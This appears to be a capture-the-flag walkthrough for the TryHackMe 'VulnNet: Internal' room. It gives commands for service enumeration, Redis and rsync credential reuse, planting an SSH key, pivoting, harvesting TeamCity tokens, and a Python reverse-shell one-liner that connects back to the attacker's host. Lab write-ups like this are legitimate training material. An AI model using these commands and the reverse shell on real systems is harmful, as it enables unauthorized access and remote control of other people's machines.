VulnNet: Internal

Room Link: https://tryhackme.com/room/vulnnetinternal

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/139 - NetBIOS

nbtscan $VICTIM

TCP/445 - SMB

In SMB there is the first flag.

Kali

smbget -R smb://$VICTIM/shares
smbclient  \\\\$VICTIM\\shares
smb: \> cd temp
smb: \temp\> get services.txt
smb: \temp\> cd ..
smb: \> cd data
smb: \data\> get data.txt 
smb: \data\> get business-req.txt 

TCP/2049 - NFS

Kali

showmount -e $VICTIM
mkdir /mnt/nfs
mount $VICTIM:/opt/conf /mnt/nfs
cd /mnt/nfs
cat redis/redis.conf

TCP/6379 - Redis

Kali

redis-cli -h $VICTIM -a "B65Hx562F@ggAZ@F"
10.10.232.200:6379> KEYS *
10.10.232.200:6379> KEYS "internal flag"
10.10.232.200:6379> GET "internal flag"

Kali

KEYS "authlist"
LRANGE authlist 1 100

Kali

echo "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" | base64 -d

TCP/873 - RSYNC

We are able to transfer out key to allow us to login to as the sys-internal user.

Kali

rsync --list-only rsync://$VICTIM 
rsync --list-only rsync://rsync-connect@$VICTIM/files
Password: Hcg3HP67@TW@Bc72v
ssh-keygen -t rsa
cp ~/.ssh/id_rsa.pub authorized_keys
rsync authorized_keys rsync://rsync-connect@$VICTIM/files/sys-internal/.ssh
Password: Hcg3HP67@TW@Bc72v

TCP/22 - SSH

Kali

ssh sys-internal@$VICTIM

Victim

ss -ltp

Kali

ssh -D 9050 sys-internal@$VICTIM

Add the token in the Authentication token. There was multiple listed, it was the last one

Victim

grep -iR token /TeamCity/logs/ 2>/dev/null

Kali

nc -lvnp 1337

Custom script

export RHOST="$KALI";export RPORT=1337;python3 -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'